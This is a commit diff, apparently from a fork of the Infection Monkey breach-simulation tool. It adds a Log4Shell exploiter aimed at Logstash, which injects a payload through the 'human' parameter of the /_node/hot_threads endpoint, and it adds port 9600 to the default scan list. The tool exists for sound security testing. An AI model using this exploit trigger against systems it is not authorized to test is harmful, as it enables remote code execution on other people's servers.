forked from p34709852/monkey
Agent, Island: Add Logstash service to Log4Shell exploit
This commit is contained in:
parent
30c41592fb
commit
ab7a47384c
|
@ -4,7 +4,8 @@ from .i_service_exploiter import IServiceExploiter
|
|||
from .poc_docker import DockerPOCExploit
|
||||
from .solr import SolrExploit
|
||||
from .tomcat import TomcatExploit
|
||||
from .logstash import LogStashExploit
|
||||
|
||||
|
||||
def get_log4shell_service_exploiters() -> List[IServiceExploiter]:
|
||||
return [DockerPOCExploit(), SolrExploit(), TomcatExploit()]
|
||||
return [DockerPOCExploit(), SolrExploit(), TomcatExploit(), LogStashExploit()]
|
||||
|
|
|
@ -0,0 +1,20 @@
|
|||
from logging import getLogger
|
||||
|
||||
import requests
|
||||
|
||||
from infection_monkey.exploit.log4shell_utils.service_exploiters import IServiceExploiter
|
||||
from infection_monkey.model import VictimHost
|
||||
|
||||
logger = getLogger(__name__)
|
||||
|
||||
|
||||
class LogStashExploit(IServiceExploiter):
|
||||
service_name = "LogStash"
|
||||
|
||||
@staticmethod
|
||||
def trigger_exploit(payload: str, host: VictimHost, port: int):
|
||||
url = f"http://{host.ip_addr}:{port}/_node/hot_threads?human={payload}"
|
||||
try:
|
||||
resp = requests.get(url, timeout=5, verify=False) # noqa DUO123
|
||||
except requests.ReadTimeout as e:
|
||||
logger.debug(f"Log4shell request failed {e}")
|
|
@ -129,7 +129,7 @@ INTERNAL = {
|
|||
"type": "array",
|
||||
"uniqueItems": True,
|
||||
"items": {"type": "integer"},
|
||||
"default": [80, 8080, 443, 8008, 7001, 9200, 8983],
|
||||
"default": [80, 8080, 443, 8008, 7001, 9200, 8983, 9600],
|
||||
"description": "List of ports the monkey will check if are being used "
|
||||
"for HTTP",
|
||||
},
|
||||
|
|
Loading…
Reference in New Issue